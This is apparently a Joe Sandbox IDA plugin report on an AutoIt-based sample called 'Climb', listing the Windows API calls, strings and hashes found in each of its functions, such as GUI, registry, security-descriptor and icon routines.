                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                                      • String ID: <)\$<)\$AutoIt v3 GUI$(\$(\$(\
                                                                                                                                                                      • API String ID: 1458621304-3033108029
                                                                                                                                                                      • Opcode ID: 777e0b83e2916f0d933b8fcee3fc0b599118137f623deb2bb09ef658014dcd2a
                                                                                                                                                                      • Instruction ID: 075dd60477094fc638f6c3c5be5f7dde12adbe4c0f627ddce9852199cd33c7b4
                                                                                                                                                                      • Opcode Fuzzy Hash: 777e0b83e2916f0d933b8fcee3fc0b599118137f623deb2bb09ef658014dcd2a
                                                                                                                                                                      • Instruction Fuzzy Hash: 3FB17A31A00209EFDB14DFA8CD55BAE7BB5FB48314F10421AFA05AB2E0DBB4E944DB55
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 00581BC4
                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 00581BD9
                                                                                                                                                                      • GetWindowRect.USER32(00000000), ref: 00581BE0
                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00581C35
                                                                                                                                                                      • DestroyWindow.USER32(?), ref: 00581C55
                                                                                                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00581C89
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00581CA7
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00581CB9
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000421,?,?), ref: 00581CCE
                                                                                                                                                                      • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00581CE1
                                                                                                                                                                      • IsWindowVisible.USER32(00000000), ref: 00581D3D
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00581D58
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00581D6C
                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00581D84
                                                                                                                                                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 00581DAA
                                                                                                                                                                      • GetMonitorInfoW.USER32(00000000,?), ref: 00581DC4
                                                                                                                                                                      • CopyRect.USER32(?,?), ref: 00581DDB
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000412,00000000), ref: 00581E46
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                                                      • String ID: ($0$tooltips_class32
                                                                                                                                                                      • API String ID: 698492251-4156429822
                                                                                                                                                                      • Opcode ID: f310fabb9159a0e4be2872ae53a629181472b9c02b0d4e22ca558600f61c2f72
                                                                                                                                                                      • Instruction ID: 95e5a2d2093035ac6903b04e9aea247cb87ce9d14eb6c4a434b803f34ad9e610
                                                                                                                                                                      • Opcode Fuzzy Hash: f310fabb9159a0e4be2872ae53a629181472b9c02b0d4e22ca558600f61c2f72
                                                                                                                                                                      • Instruction Fuzzy Hash: 83B19C71604701AFD704EF65C984B6ABFE9FF84310F00891DF999AB2A1D771E805CBA6
                                                                                                                                                                      APIs
                                                                                                                                                                      • CharUpperBuffW.USER32(?,?), ref: 00580D81
                                                                                                                                                                      • _wcslen.LIBCMT ref: 00580DBB
                                                                                                                                                                      • _wcslen.LIBCMT ref: 00580E25
                                                                                                                                                                      • _wcslen.LIBCMT ref: 00580E8D
                                                                                                                                                                      • _wcslen.LIBCMT ref: 00580F11
                                                                                                                                                                      • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00580F61
                                                                                                                                                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00580FA0
                                                                                                                                                                        • Part of subcall function 0050FD52: _wcslen.LIBCMT ref: 0050FD5D
                                                                                                                                                                        • Part of subcall function 00552B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00552BA5
                                                                                                                                                                        • Part of subcall function 00552B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00552BD7
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                      • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                                                      • API String ID: 1103490817-719923060
                                                                                                                                                                      • Opcode ID: eeabcd2a56c621350eb5d943581ed63ad8b7abd885ac3dda9a712f80607b3ea8
                                                                                                                                                                      • Instruction ID: 1453e9e1747a36e88d78d718b936a8d42e55b597f4d1c2f19b55d175f788555d
                                                                                                                                                                      • Opcode Fuzzy Hash: eeabcd2a56c621350eb5d943581ed63ad8b7abd885ac3dda9a712f80607b3ea8
                                                                                                                                                                      • Instruction Fuzzy Hash: 6EE1D1312046418FC754EF24C95187ABBEAFF84314B14895DF896AB7E1DB30ED49CB91
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00551A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00551A60
                                                                                                                                                                        • Part of subcall function 00551A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,005514E7,?,?,?), ref: 00551A6C
                                                                                                                                                                        • Part of subcall function 00551A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,005514E7,?,?,?), ref: 00551A7B
                                                                                                                                                                        • Part of subcall function 00551A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,005514E7,?,?,?), ref: 00551A82
                                                                                                                                                                        • Part of subcall function 00551A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00551A99
                                                                                                                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00551741
                                                                                                                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00551775
                                                                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 0055178C
                                                                                                                                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 005517C6
                                                                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 005517E2
                                                                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 005517F9
                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00551801
                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00551808
                                                                                                                                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00551829
                                                                                                                                                                      • CopySid.ADVAPI32(00000000), ref: 00551830
                                                                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0055185F
                                                                                                                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00551881
                                                                                                                                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00551893
                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 005518BA
                                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 005518C1
                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 005518CA
                                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 005518D1
                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 005518DA
                                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 005518E1
                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 005518ED
                                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 005518F4
                                                                                                                                                                        • Part of subcall function 00551ADF: GetProcessHeap.KERNEL32(00000008,005514FD,?,00000000,?,005514FD,?), ref: 00551AED
                                                                                                                                                                        • Part of subcall function 00551ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,005514FD,?), ref: 00551AF4
                                                                                                                                                                        • Part of subcall function 00551ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,005514FD,?), ref: 00551B03
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4175595110-0
                                                                                                                                                                      • Opcode ID: 14e14c5c2d6d2dd64e6f7a24fd284b46968d4060d83521ffa12697d0d05ebd70
                                                                                                                                                                      • Instruction ID: 781ecc525e61f3d1d26023924a08bc36ce721a6cc7b0a3848db74a7f83b545d9
                                                                                                                                                                      • Opcode Fuzzy Hash: 14e14c5c2d6d2dd64e6f7a24fd284b46968d4060d83521ffa12697d0d05ebd70
                                                                                                                                                                      • Instruction Fuzzy Hash: 62715AB2D0060AABDB20DFA5DC48FAEBFB8FF44351F144126ED15A6190E7319A09CB64
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0057CF1D
                                                                                                                                                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,0058DCD0,00000000,?,00000000,?,?), ref: 0057CFA4
                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0057D004
                                                                                                                                                                      • _wcslen.LIBCMT ref: 0057D054
                                                                                                                                                                      • _wcslen.LIBCMT ref: 0057D0CF
                                                                                                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0057D112
                                                                                                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0057D221
                                                                                                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0057D2AD
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0057D2E1
                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0057D2EE
                                                                                                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0057D3C0
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                                                                                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                                      • API String ID: 9721498-966354055
                                                                                                                                                                      • Opcode ID: e234e4400cfdc2cd131063ffc8fe348a147560d5b8bf58926b5828b3c681ff61
                                                                                                                                                                      • Instruction ID: 264881c70d0b74f0bafa0fe99d2f75571ba92efc27e3ec8589ae19856b94de0d
                                                                                                                                                                      • Opcode Fuzzy Hash: e234e4400cfdc2cd131063ffc8fe348a147560d5b8bf58926b5828b3c681ff61
                                                                                                                                                                      • Instruction Fuzzy Hash: 66129A356042059FDB14DF15D885A2ABBF5FF88718F04885DF98A9B3A2CB34EC42CB95
                                                                                                                                                                      APIs
                                                                                                                                                                      • CharUpperBuffW.USER32(?,?), ref: 00581462
                                                                                                                                                                      • _wcslen.LIBCMT ref: 0058149D
                                                                                                                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 005814F0
                                                                                                                                                                      • _wcslen.LIBCMT ref: 00581526
                                                                                                                                                                      • _wcslen.LIBCMT ref: 005815A2
                                                                                                                                                                      • _wcslen.LIBCMT ref: 0058161D
                                                                                                                                                                        • Part of subcall function 0050FD52: _wcslen.LIBCMT ref: 0050FD5D
                                                                                                                                                                        • Part of subcall function 00553535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00553547
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                                                      • API String ID: 1103490817-4258414348
                                                                                                                                                                      • Opcode ID: e6e15986af3b95da5fc13fbbbbe097e49c6bb4708ad7f83ef2282698a3dce164
                                                                                                                                                                      • Instruction ID: 58578fbbdac795fc9151c74788dcd66ccdb44625774e713d79d07b756799619a
                                                                                                                                                                      • Opcode Fuzzy Hash: e6e15986af3b95da5fc13fbbbbe097e49c6bb4708ad7f83ef2282698a3dce164
                                                                                                                                                                      • Instruction Fuzzy Hash: 19E1AD316047028FCB14EF25C45186ABBEAFFD4314B14895DF896AB7A2DB30ED46CB85
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                                                      • API String ID: 1256254125-909552448
                                                                                                                                                                      • Opcode ID: c2c41f09fdf8110b8a426a9f814551ee2ed2bb316dfcb1072e581847ca5be5ba
                                                                                                                                                                      • Instruction ID: 9fcb8bbf442ec0d636ac44081cdc0266385e49b0cc644f0cd45c7580b89ba2ce
                                                                                                                                                                      • Opcode Fuzzy Hash: c2c41f09fdf8110b8a426a9f814551ee2ed2bb316dfcb1072e581847ca5be5ba
                                                                                                                                                                      • Instruction Fuzzy Hash: 1D71F97360012A8BCF109E38E9415FA3FB6BF60758B218524E85D97294EA35DD44E7B0
                                                                                                                                                                      APIs
                                                                                                                                                                      • _wcslen.LIBCMT ref: 00588DB5
                                                                                                                                                                      • _wcslen.LIBCMT ref: 00588DC9
                                                                                                                                                                      • _wcslen.LIBCMT ref: 00588DEC
                                                                                                                                                                      • _wcslen.LIBCMT ref: 00588E0F
                                                                                                                                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00588E4D
                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00586691), ref: 00588EA9
                                                                                                                                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00588EE2
                                                                                                                                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00588F25
                                                                                                                                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00588F5C
                                                                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 00588F68
                                                                                                                                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00588F78
                                                                                                                                                                      • DestroyIcon.USER32(?,?,?,?,?,00586691), ref: 00588F87
                                                                                                                                                                      • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00588FA4
                                                                                                                                                                      • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00588FB0
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                                                                                      • String ID: .dll$.exe$.icl
                                                                                                                                                                      • API String ID: 799131459-1154884017
                                                                                                                                                                      • Opcode ID: a70e0d0a40bdb74830c27d4fa5f7ca2c078cd5862cd0877e5267701f24f4cd2d
                                                                                                                                                                      • Instruction ID: f89bf12efd4c1f9b21bd3b50a220ba77e9ef9a1f64b731dcc92bdcbcb4204f5d
                                                                                                                                                                      • Opcode Fuzzy Hash: a70e0d0a40bdb74830c27d4fa5f7ca2c078cd5862cd0877e5267701f24f4cd2d
                                                                                                                                                                      • Instruction Fuzzy Hash: AB61FF71900209BAEB14EF64CC46BBE7BACFF08B10F50450AFD15E60D1DB74A984DBA0
                                                                                                                                                                      APIs
                                                                                                                                                                      • CharLowerBuffW.USER32(?,?), ref: 0056493D
                                                                                                                                                                      • _wcslen.LIBCMT ref: 00564948
                                                                                                                                                                      • _wcslen.LIBCMT ref: 0056499F
                                                                                                                                                                      • _wcslen.LIBCMT ref: 005649DD
                                                                                                                                                                      • GetDriveTypeW.KERNEL32(?), ref: 00564A1B
                                                                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00564A63
                                                                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00564A9E
                                                                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00564ACC
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                                                                                                                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                                      • API String ID: 1839972693-4113822522
                                                                                                                                                                      • Opcode ID: 5eebb2e1e57db5a55cd347362113c90f9263f97470aea553a1da08c714aa5b8f
                                                                                                                                                                      • Instruction ID: 872bf6fd23e5158b9c6084b0bc875ae16c164f8c036c183b26810c088982d3b0
                                                                                                                                                                      • Opcode Fuzzy Hash: 5eebb2e1e57db5a55cd347362113c90f9263f97470aea553a1da08c714aa5b8f
                                                                                                                                                                      • Instruction Fuzzy Hash: 3671E13250820A9FC710EF25C84097BBBE5FF98758F10492EF89697261EB34ED45CB91
                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadIconW.USER32(00000063), ref: 00556395
                                                                                                                                                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 005563A7
                                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 005563BE
                                                                                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 005563D3
                                                                                                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 005563D9
                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 005563E9
                                                                                                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 005563EF
                                                                                                                                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00556410
                                                                                                                                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0055642A
                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00556433
                                                                                                                                                                      • _wcslen.LIBCMT ref: 0055649A
                                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 005564D6
                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 005564DC
                                                                                                                                                                      • GetWindowRect.USER32(00000000), ref: 005564E3
                                                                                                                                                                      • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 0055653A
                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 00556547
                                                                                                                                                                      • PostMessageW.USER32(?,00000005,00000000,?), ref: 0055656C
                                                                                                                                                                      • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00556596
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 895679908-0
                                                                                                                                                                      • Opcode ID: 615a86c0bd327e4fb1ff713c5d49e0314f1a8fbbc6494adec8ea9b877aa5cb93
                                                                                                                                                                      • Instruction ID: 6a5e3e7b0bcc874d03635f59e0e9a439bc1320cab4120d2bb68cdae1ad8a4a13
                                                                                                                                                                      • Opcode Fuzzy Hash: 615a86c0bd327e4fb1ff713c5d49e0314f1a8fbbc6494adec8ea9b877aa5cb93
                                                                                                                                                                      • Instruction Fuzzy Hash: A871BF31900749EFDB20DFA8CE95AAEBBF5FF48705F500919E986A35A0D770E948CB10
                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F89), ref: 00570884
                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F8A), ref: 0057088F
                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 0057089A
                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F03), ref: 005708A5
                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F8B), ref: 005708B0
                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F01), ref: 005708BB
                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F81), ref: 005708C6
                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F88), ref: 005708D1
                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F80), ref: 005708DC
                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F86), ref: 005708E7
                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F83), ref: 005708F2
                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F85), ref: 005708FD
                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F82), ref: 00570908
                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F84), ref: 00570913
                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F04), ref: 0057091E
                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 00570929
                                                                                                                                                                      • GetCursorInfo.USER32(?), ref: 00570939
